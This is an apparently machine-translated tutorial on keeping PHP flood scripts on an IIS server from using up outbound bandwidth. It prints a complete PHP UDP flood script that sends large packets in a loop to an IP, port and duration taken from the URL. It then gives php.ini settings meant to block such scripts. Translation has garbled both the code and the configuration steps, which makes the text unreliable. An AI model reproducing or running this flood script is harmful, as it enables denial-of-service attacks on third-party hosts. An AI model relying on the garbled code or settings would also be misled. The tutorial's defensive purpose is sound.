How does iis prevent php ddos from occupying network bandwidth and server resources?

Use PHP code to call sockets and directly use the server's network to attack other IP addresses. Previously I encountered this problem in apache, today we will talk about how to prevent php ddos attacks from occupying the network bandwidth and server resources in iis.

Common php ddos code is as follows:

The Code is as follows:

Copy code

$ Packets = 0; $ Ip = $ _ GET ['IP']; $ Rand = $ _ GET ['Port']; Set_time_limit (0 ); Ignore_user_abort (FALSE ); $ Exec_time = $ _ GET ['time']; $ Time = time (); Print "Flooded: $ ip on port $ rand "; $ Max_time = $ time + $ exec_time; For ($ I = 0; I I <65535; $ I ++ ){ $ Out. = "X "; } While (1 ){ $ Packets ++; If (time ()> $ max_time ){ Break; } $ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 ); If ($ fp ){ Fwrite ($ fp, $ out ); Fclose ($ fp ); } } Echo "Packet complete ". time ('H: I: s '). "with $ packets (". round ($ packets * 65)/1024, 2 ). "mB) packets averaging ". round ($ packets/$ exec_time, 2 ). "packets/s n "; ?>

Characteristics:

When IIS is enabled, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to others. This is different from the DDOS attack. DDOS constantly receives a large number of packets.

Solution:

Set the value to Off in c: windowsphp. ini.

The Code is as follows:	Copy code
Allow_url_fopen = Off

And:

The Code is as follows:	Copy code
; Extension = php_sockets.dll

The preceding; number must be available, which means to restrict the use of sockets. dll

Then:

The Code is as follows:	Copy code
; Ignore_user_abort = On

Remove the previous; number

Then restart IIS

If the above method still does not work, you can disable PHP extension testing in the extensions allowed in IIS.

NOTE: If your server does not need a running mechanism, php can be disabled. If necessary, you can disable php_sockets.dll. Another way is to block all udp ports, you only need to open some important ports such as 80.